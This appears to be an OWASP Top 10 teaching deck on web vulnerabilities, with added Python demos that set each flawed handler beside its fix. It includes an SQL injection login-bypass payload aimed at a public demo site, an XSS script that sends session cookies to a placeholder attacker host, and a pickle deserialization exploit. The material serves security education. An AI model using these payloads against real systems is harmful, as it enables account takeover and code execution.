OWASP
The Open Web Application Security Project (OWASP) is an online
community that produces freely available articles, methodologies,
documentation, tools, and technologies in the field of web application
security.
Mark Curphey started OWASP on Sep 9, 2001.
OWASP Top 10
The OWASP "Top Ten" was first published in 2003 and is updated
regularly.
It aims to raise awareness about application security by
identifying some of the most critical risks facing organizations.
OWASP Top 10 - 2017
A1 - Injection
A2 - Broken Authentication
A3 - Sensitive Data Exposure
A4 - XML External Entities (XXE)
A5 - Broken Access Control
A6 - Security Misconfiguration
A7 - Cross-Site Scripting (XSS)
A8 - Insecure Deserialization
A9 - Using Components with Known Vulnerabilities
A10 - Insufficient Logging & Monitoring
A1 - SQL Injection
Unsanitized user input is concatenated into SQL statements, letting an
attacker pass SQL commands to the backend database for execution.
It is a flaw in the web application, not a DB or web server issue.
Impact:
Authentication bypass
Information disclosure
Compromised integrity & availability of data
SQL Injection Login
URL = http://demo.testfire.net/index.jsp
Username: ' or 'bug'='bug
Password: ' or 'bug'='bug
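The login bypass above, reproduced against a constructed in-memory SQLite table so it can be run offline (this is an added example, not code from the deck or from the demo.testfire.net site). It shows the exact query the `' or 'bug'='bug` payload produces when input is concatenated into SQL, and the parameterized form that treats the same input as a plain string:

```python
import sqlite3

PAYLOAD = "' or 'bug'='bug"   # the username/password used on the slide


def make_db():
    """Constructed demo table: one user with a known password."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('jsmith', 'demo1234')")
    return db


def build_vulnerable_query(username, password):
    # Flaw: user input is spliced directly into the SQL text. With the payload
    # this becomes:
    #   ... WHERE username = '' or 'bug'='bug' AND password = '' or 'bug'='bug'
    # AND binds tighter than OR, so the trailing OR makes the WHERE clause true
    # for every row and the first user is returned.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    return db.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_safe(db, username, password):
    # Fix: placeholders. The driver sends the values separately from the SQL
    # text, so quotes inside the input are data, never SQL syntax.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def demo():
    db = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(db, PAYLOAD, PAYLOAD),
        "safe_bypass": login_safe(db, PAYLOAD, PAYLOAD),
        "safe_valid": login_safe(db, "jsmith", "demo1234"),
    }


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print(demo())
```

The same precedence trick works with any tautology (`' or 1=1 --`); the fix is never a blacklist of such strings but the separation of code and data that parameterized queries give.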
A2 - Broken Authentication
Password exploitation
Predictable login credentials
Session IDs exposed in URLs
Session timeout exploitation
User authentication credentials are not protected when stored.
A3 - Sensitive Data Exposure
The application does not protect sensitive information from being
disclosed: passwords, credit card data, session tokens, or other
authentication credentials.
How to Prevent
Never store or transmit sensitive data in clear text; hash stored
passwords with a salted, deliberately slow algorithm and use TLS in
transit.
Use strong, unique passwords for your applications and rotate them
when compromise is suspected.
Use current, well-reviewed encryption algorithms and disable weak ones.
Disable autocomplete on forms that collect sensitive data.
A4 - XML External Entities (XXE)
The application parses XML from an untrusted source with a
misconfigured XML parser that resolves external entities.
The attacker sends malicious XML containing a reference to an external
entity (a local file path or an internal URL) to the victim web
application.
Allows access to protected files & internal services; entity
expansion can also be used for denial of service.
A5 - Broken Access Control
Exploitability - the attacker changes a parameter value (an object ID,
a role, a function name) to one they are not authorized to use.
Technical impact - privilege escalation, access to other users' data.
Insecure direct object reference (IDOR) - exposure of internal
implementation objects (database keys, file names) whose ownership the
application never checks.
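Both failure modes on this slide as an added example (not from the deck), using constructed users and invoices: an IDOR where the invoice ID from the request is used unchecked, and a privilege escalation where the client supplies its own role. Each flawed handler is paired with the server-side check that closes it:

```python
# Constructed demo data: three accounts and two invoices.
USERS = {"alice": {"role": "user"}, "bob": {"role": "user"}, "root": {"role": "admin"}}
INVOICES = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 980.50},
}


class Forbidden(Exception):
    """Raised when the session user may not perform the requested action."""


# --- IDOR: the object id comes straight from the request ----------------------

def get_invoice_vulnerable(session_user, params):
    # Flaw: the id is looked up as-is. Alice changes ?id=1001 to ?id=1002 and
    # reads Bob's invoice; nothing ties the object to the caller.
    return INVOICES[int(params["id"])]


def get_invoice_safe(session_user, params):
    invoice = INVOICES.get(int(params["id"]))
    # Ownership is checked against the authenticated session. Missing and
    # foreign objects get the same answer so ids cannot be enumerated.
    if invoice is None or invoice["owner"] != session_user:
        raise Forbidden("invoice not accessible")
    return invoice


# --- Privilege escalation: the client supplies its own role -------------------

def delete_user_vulnerable(session_user, params):
    # Flaw: trusting a role carried in the request. Editing role=user to
    # role=admin in the form body or cookie is the whole attack.
    if params.get("role") != "admin":
        raise Forbidden("admins only")
    return "deleted %s" % params["target"]


def delete_user_safe(session_user, params):
    # The role comes from the server-side identity record, never from input.
    if USERS[session_user]["role"] != "admin":
        raise Forbidden("admins only")
    return "deleted %s" % params["target"]


if __name__ == "__main__":
    print(get_invoice_vulnerable("alice", {"id": "1002"}))      # Bob's invoice leaks
    print(delete_user_vulnerable("alice", {"role": "admin", "target": "bob"}))
    for handler in (get_invoice_safe, delete_user_safe):
        try:
            handler("alice", {"id": "1002", "role": "admin", "target": "bob"})
        except Forbidden as exc:
            print(handler.__name__, "->", exc)
```

The pattern to look for in review is any authorization decision that reads the subject (who), the object (what) or the permission (may they) from request data instead of from state the server controls.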
A7 - Cross-Site Scripting (XSS)
Malicious script execution in the victim's browser
Exploiting the user's privileges
Data manipulation
Session hijacking
Brute-force password cracking
Injects hidden iframes and pop-ups
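A reflected XSS as an added example (not from the deck): a search term is echoed into the page, once unescaped and once escaped for the context it lands in. The payload is constructed and only reports the cookie to an attacker-controlled host to illustrate the session-hijacking bullet:

```python
import html
from urllib.parse import quote

# Constructed attacker input: reflected into the page, it ships the session
# cookie to a host the attacker controls (the hostname is a placeholder).
XSS_PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
               '+document.cookie</script>')


def render_search_vulnerable(query):
    # Flaw: the query is reflected into HTML untouched, so the browser
    # parses the payload as markup and runs the script.
    return "<p>Results for: " + query + "</p>"


def render_search_safe(query):
    # HTML text context: < > & " ' become entities, so the payload is shown
    # as text rather than parsed as a tag.
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def render_search_link_safe(query):
    # URL inside an attribute needs two layers: percent-encode for the URL
    # component, then HTML-escape for the attribute value. Escaping is always
    # per output context; one generic "sanitize" call does not cover both.
    encoded = html.escape(quote(query, safe=""), quote=True)
    return '<a href="/search?q=%s">search again</a>' % encoded


def has_executable_script(page):
    """Demo check: does the output contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(XSS_PAYLOAD))
    print(render_search_safe(XSS_PAYLOAD))
    print(render_search_link_safe(XSS_PAYLOAD))
```

Output encoding is the primary control; marking the session cookie HttpOnly limits what a successful injection can steal, and a Content-Security-Policy limits where an injected script may send data.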
A8 - Insecure Deserialization
Occurs when untrusted serialized data is deserialized and used to abuse
the logic of the application, up to remote code execution.
Remediation
Validate the data before using it; prefer data-only formats such as
JSON over native object serialization.
Use a checksum or digital signature on serialized data transferred
between two endpoints, and verify it before deserializing.
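An added example (not from the deck) in two halves: first, why deserializing attacker bytes with Python's pickle is code execution (the payload calls a harmless `os.getcwd` where a real attack would call `os.system`); second, the remediation the slide describes, a data-only format with an HMAC that is verified before parsing, followed by structural validation. The key is a constructed demo secret:

```python
import hashlib
import hmac
import json
import os
import pickle


# --- What insecure deserialization hands the attacker -------------------------

class Exploit:
    """Constructed attacker object. pickle records the callable and arguments
    returned by __reduce__, and loads() invokes them. os.getcwd is harmless;
    os.system with a shell command is the usual real-world choice."""
    def __reduce__(self):
        return (os.getcwd, ())


def attacker_payload():
    return pickle.dumps(Exploit())


def load_untrusted_pickle(data):
    # Flaw: the callable inside the payload runs during loading, before any
    # validation of the resulting object could happen.
    return pickle.loads(data)


def pickle_payload_runs_code():
    """True if loading the payload executed os.getcwd() in our process."""
    return load_untrusted_pickle(attacker_payload()) == os.getcwd()


# --- Remediation: data-only format + MAC, checked before parsing ---------------

DEMO_KEY = b"constructed-demo-key-not-for-production"  # assumption: shared secret


def serialize_signed(obj, key=DEMO_KEY):
    body = json.dumps(obj, sort_keys=True).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode("ascii")
    return body + b"." + tag


def deserialize_signed(blob, key=DEMO_KEY):
    body, _, tag = blob.rpartition(b".")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode("ascii")
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: data rejected before parsing")
    obj = json.loads(body)
    # Integrity is not validity: still check shape and values before use.
    if not isinstance(obj, dict) or set(obj) != {"user", "role"}:
        raise ValueError("unexpected structure")
    if obj["role"] not in ("user", "admin"):
        raise ValueError("unexpected role")
    return obj


if __name__ == "__main__":
    print("pickle ran attacker-chosen function:", pickle_payload_runs_code())
    blob = serialize_signed({"user": "alice", "role": "user"})
    print(deserialize_signed(blob))
    try:
        deserialize_signed(blob.replace(b'"role": "user"', b'"role": "admin"'))
    except ValueError as exc:
        print("tampered:", exc)
```

An HMAC only proves the data came from a holder of the key; it does not make native deserialization safe, so keep the data-only format even when the channel is signed.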
A9 - Using Components with Known Vulnerabilities
Applications and APIs use components with known vulnerabilities.
Components, such as libraries, frameworks, and other software
modules, run with the same privileges as the application.
Attackers search exploit sites for published vulnerabilities in the
component versions the application uses.
A10 - Insufficient Logging & Monitoring
Insufficient logging lets malicious events go unrecorded, or records
them without the details needed to investigate.
Effective logging needs:
Sufficient content (who, what, when, from where, outcome)
Good format (structured, machine-readable)
Response plan (alerts that someone acts on)
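The three points on this slide as an added example (not from the deck): a structured log line that carries the fields an investigator needs, and detection logic that reads such lines back and flags a burst of failed logins from one source address. The log lines and addresses are constructed for the demo:

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta


def log_event(ts, event, user, src_ip, outcome, **extra):
    """Sufficient content, good format: one JSON object per line with when,
    what, who, from where, and what happened. A bare "login failed" line
    records the event but cannot be attributed or correlated."""
    record = {"ts": ts, "event": event, "user": user,
              "src_ip": src_ip, "outcome": outcome}
    record.update(extra)
    return json.dumps(record, sort_keys=True)


# Constructed sample log: six failures from one address within 95 seconds,
# two scattered failures from another, and one success.
LOG_LINES = [
    log_event("2024-03-01T10:00:05", "login_failed", "admin", "203.0.113.5", "bad_password"),
    log_event("2024-03-01T10:00:20", "login_failed", "admin", "203.0.113.5", "bad_password"),
    log_event("2024-03-01T10:00:31", "login_failed", "root", "203.0.113.5", "no_such_user"),
    log_event("2024-03-01T10:00:47", "login_failed", "jsmith", "203.0.113.5", "bad_password"),
    log_event("2024-03-01T10:01:02", "login_failed", "jsmith", "203.0.113.5", "bad_password"),
    log_event("2024-03-01T10:01:40", "login_failed", "admin", "203.0.113.5", "bad_password"),
    log_event("2024-03-01T10:03:00", "login_failed", "jsmith", "198.51.100.7", "bad_password"),
    log_event("2024-03-01T10:03:30", "login_success", "jsmith", "198.51.100.7", "ok"),
    log_event("2024-03-01T10:40:00", "login_failed", "jsmith", "198.51.100.7", "bad_password"),
]


def failed_login_bursts(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {src_ip: max failures in any `window`} for addresses that reach
    `threshold`. This is the alert that the response plan has to route to
    someone: lock the source, notify the targeted accounts, or both."""
    by_ip = defaultdict(list)
    for line in lines:
        event = json.loads(line)
        if event["event"] == "login_failed":
            by_ip[event["src_ip"]].append(datetime.fromisoformat(event["ts"]))

    alerts = {}
    for ip, times in by_ip.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[ip] = best
    return alerts


if __name__ == "__main__":
    print(failed_login_bursts(LOG_LINES))   # {'203.0.113.5': 6}
```

Note what the detection depends on: a timestamp, an event name and a source address in every line. If any of the three is missing from the log format, the rule cannot be written, which is the practical meaning of "sufficient content".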
Importance of VAPT
Comprehensive testing for applications and networks.
Identifies the weakest link in the chain.
Eliminates false positives and prioritizes real threats.
Detects attack vectors that manual testing alone would miss.
Finds business logic flaws that scanners cannot.